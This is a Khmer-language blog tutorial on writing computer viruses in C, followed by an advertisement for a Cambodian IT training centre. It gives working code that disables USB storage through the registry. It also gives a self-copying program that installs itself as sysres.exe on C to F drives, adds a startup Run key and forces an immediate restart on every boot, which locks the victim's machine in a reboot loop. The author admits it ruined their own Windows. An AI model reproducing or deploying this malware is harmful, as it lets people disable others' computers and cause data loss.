បង្កើតមេរោគកុំព្យូទ័រ លើកម្មវិធី C++

a
បិទ USB:

#include<stdio.h>

void main()
{
system(“reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\USBSTOR \/v Start \/t REG_DWORD \/d 4 \/f”);
}

វានឹងឆ្លងសម្រាប់អ្នកចេះសរសេរ, Compile –> RUN (Alt+ F9 and Ctrl + F9)

បើក USB:

#include<stdio.h>

void main()
{
system(“reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\USBSTOR \/v Start \/t REG_DWORD \/d 3 \/f”);
}
បង្កើតមេរោគ Restart កុំព្យូទ័រ ពេល Startup

របៀបបង្កើតមេរោគ​ម៉្យាងដែលវាមានសមត្ថភាពអាច Restart កុំព្យូទ័រ ដោយខ្លួននៅពេលដែលយើងបើក។

នៅពេលដែលមេរោគនេះឆ្លង ចូលកុំព្យូទ័រណាហើយ កុំព្យូទ័រនោះតែងតែ Restart ដោយខ្លួនវាជារៀងរាល់ពេល

មានន័យថានៅពេលដែលកុំព្យូទ័រចាប់ផ្ដើម Boot គឺមេរោគវាចាប់ផ្ដើមធ្វើទុក្ខបុកម្នេញតែម្ដង។

ដោយវិធីបង្កើតវាយើងត្រូវសរសេរកូដនៅលើភាសា C

សូមផ្ដាំថា ប្រសិនបើកុំព្យូទ័រលោកអ្នកមិនមានកម្មវិធីកម្ចាត់មេរោគស្របច្បាប់ទេ សូមកុំព្យាយាមបង្កើតវាលេងអី

ព្រោះបានអនុវត្ដន៍ខូច Windows អស់មួយហើយ។

សូមអនុវត្តន៍ជាមួយកូដខាងក្រោម

#include<stdio.h>
#include<dos.h>
#include<dir.h>  
int found,drive_no;char buff[128];
void findroot()
{
int done;
struct ffblk ffblk; //File block structure
done=findfirst(“C:\\windows\\system”,&ffblk,FA_DIREC); //បញ្ជាក់ root drive
if(done==0)
{
done=findfirst(“C:\\windows\\system\\sysres.exe”,&ffblk,0); //បញ្ជាក់ថាទៅជាមេរោគបានឆ្លង ឬមិនទាន់ឆ្លង វានឹងតំឡើង ឬអត់
if(done==0)
{
found=1;//មានន័យថា system របស់អ្នកបានឆ្លងរួចរាល់ហើយ
return;
}
drive_no=1;
return;
}
done=findfirst(“D:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“D:\\windows\\system\\sysres.exe”,&ffblk,0);
if
(done==0)
{
found=1;return;
}
drive_no=2;
return;
}
done=findfirst(“E:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“E:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=3;
return;
}
done=findfirst(“F:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“F:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=4;
return;
}
else
exit(0);
}
void main()
{
FILE *self,*target;
findroot();
if(found==0) //ប្រសិនបើ System មិនទាន់បានឆ្លង
{
self=fopen(_argv[0],”rb”); //មេរោគ នឹងដំណើរការដោយខ្លួនឯង
switch(drive_no)
{
case 1:
target=fopen(“C:\\windows\\system\\sysres.exe”,”wb”); //កន្លែងចម្លងខ្លួនដោយខ្លួនវាផ្ទាល់
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
C:\\windows\\system\\ sysres.exe”); //ដាក់ file  registry សម្រាប់ starup
break;
case 2:
target=fopen(“D:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
D:\\windows\\system\\sysres.exe”);
break;
case 3:
target=fopen(“E:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
E:\\windows\\system\\sysres.exe”);
break;
case 4:
target=fopen(“F:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
F:\\windows\\system\\sysres.exe”);
break;
default:
exit(0);
}
while(fread(buff,1,1,self)>0)
fwrite(buff,1,1,target);
fcloseall();
}
else
system(“shutdown -r -t 0″); //ប្រសិន system ត្រូវបានឆ្លងរួចហើយវានឹងដំណើរ command  restart
———————————————————————-

មជ្ឈមណ្ឌល អាយធី ខេប៊ូ-IT CAMBO សរសេរកម្មវិធី:
– រចនាវ៉ិបសាយ & Hosting គ្រប់គ្រងក្រុមហ៊ុន…
– បង្កើតកម្មវិធីគ្រប់គ្រងទិន្នន័យ
– ដំឡើងប្រព័ន្ធ ណែតវឺក Networkingកម្មវិធីសិក្សាបើកវគ្គខ្លី(សិស្សចាប់ពី ១០ឡើងទៅ)
–  វគ្គរចនាវ៉ិបសាយ HTML,CSS, Javascript, PHP, ASP.NET
–  វគ្គដំឡើងកុំព្យូទ័រណែតវឺក Networking
–   វគ្គជួសជុលកុំព្យូទ័រ Computer Repairing
–   វគ្គសរសេរកម្មវិធីលើ iOS (កម្មវិធី iPhone, iPAD)

ទំនាក់ទំ​នង លោក ទាវ​ ឈុន ណន: 0977778647-077778647-070778647
Email: chhunnan@gmail.com
Chat: yahoo, skype: chhunnan
www.itcambo.com
ITCAMBO-NEW